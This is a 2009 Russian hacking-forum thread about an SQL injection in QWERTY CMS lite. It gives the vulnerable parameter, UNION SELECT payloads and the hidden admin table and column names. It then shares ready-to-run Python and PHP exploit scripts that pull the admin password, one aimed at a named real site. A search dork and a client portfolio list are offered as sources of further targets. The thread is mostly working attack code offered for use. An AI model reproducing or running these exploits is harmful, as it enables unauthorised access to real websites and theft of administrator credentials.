Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   QWERTY CMS lite - SQL INJ (https://forum.antichat.xyz/showthread.php?t=106882)

b3 18.02.2009 22:37

QWERTY CMS lite - SQL INJ
 

Нашел уязвимость SQL INJ в одной малоизвестной QWERTY CMS lite. В гугле даже несмог найти авторов сего творения.
Уязвимость в файле index.php, уязвимый параметр id:
Цитата:

index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
Таблица администратора:rkh8t5po
клонки:
secret873ktlW
pass459khyf

Пароль от админки находится в колонке pass459khyf Логин: admin
Путь к Админке:
/admin/
http://www.milw0rm.com/exploits/8104

Assembler 19.02.2009 01:37

http://www.google.ru/search?q=allinurl%3A+php%3Fact%3Dpubl%26id%3D&ie=u tf-8&oe=utf-8&aq=t&rls=org.mozilla:ru:official&client=firefo x-a

Да уж -) совсем мало популярная..

faza02 24.02.2009 23:58

qwerty cms expl01t
 
Код:

#!/usr/bin/python
#QWERTY CMS expl01t
#http://sql.parsers.info
#faza02[at]gmail[dot]com
#thx login999

import urllib
import re
print "qwerty cms expl01t by faza02\n\nexample: site.com"
site=raw_input(u'site: ')
site1='http://' + site + '/index.php?act=publ&id=38+and+0+UNION+SELECT+1,unhex(hex(pass459khyf)),3,4,5+from+rkh8t5po'

pars=str(urllib.urlopen(site1).read())
title=re.findall(r'\<title\>.*?\<\/title\>',pars)
per=str(title)[2:-2]
per=per.replace('<title>','')
per=per.replace('</title>','')
print 'login: admin'
print 'passw0rd: ' + per

(с) faza02

mailbrush 25.02.2009 01:22

QWERTY CMS lite PHP Injector by mailbrush
 
QWERTY CMS lite PHP Injector by mailbrush
PHP код:

<?
$site
="http://dr-gng.dp.ua"//сайт для инжекта
function db($url){
    
$url=$url."/index.php?act=publ&id=-9+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5";
    
$fp=file_get_contents($url);
    list(
$ds,$f)=explode('<title>',$fp);
    list(
$ds,$f)=explode('</title>',$f);
    return 
$ds;
}

function 
user($url){
    
$url=$url."/index.php?act=publ&id=-9+union+select+1,concat(0x61646d696e3a,pass459khyf),3,4,5+from+rkh8t5po";
    
$fp=file_get_contents($url);
    list(
$ds,$f)=explode('<title>',$fp);
    list(
$ds,$f)=explode('</title>',$f);
    return 
$ds;
}

echo 
"<b>user():database():version() - </b>".db($site)."<br>";
echo 
"<b>admin:pass - </b>".user($site)."<br>";
?>


login999 25.02.2009 02:21

Это ж все зависит от того, как писать, можно то его и на socket написать :), а толку ? Python славится невьебённым количеством модулей, можешь взглянуть здесь :
http://docs.python.org/modindex.html , этот код можно было написать на как минимум трех модулях, причем аобсолютно без проблем :)
P.S.
Переделал код в духе минимализма :) :
Код:

#!/usr/bin/python
#QWERTY CMS expl01t
#http://sql.parsers.info
#faza02[at]gmail[dot]com
#thx login999
import urllib, re
print "qwerty cms expl01t by faza02\n\nexample: site.com"
print 'login: admin & passw0rd: ' + str(re.findall(r'\<title\>.*?\<\/title\>',str(urllib.urlopen("http://" + raw_input(u'site: ') + "/index.php?act=publ&id=38+and+0+UNION+SELECT+1,unhex(hex(pass459khyf)),3,4,5+from+rkh8t5po").read())))[2:-2].replace("<title>",'').replace("</title>",'')

Из 8 строчек кода 4 строчки - цоперайты :)
P.S. Ачат "обезвреживает" спец символы, поэтому в сплоенте после (pass459khyf)) не должно быть 2 пробела, снесите их нафик :)

Glazz 25.02.2009 17:04

Портфолио их групы , там адресочки можно взять, но спосов Assembler то же норм.
http://web-sites.kiev.ua/portfolio.php

А там реально ип админку отправляется при не праивльном заходе в админку?


Время: 10:36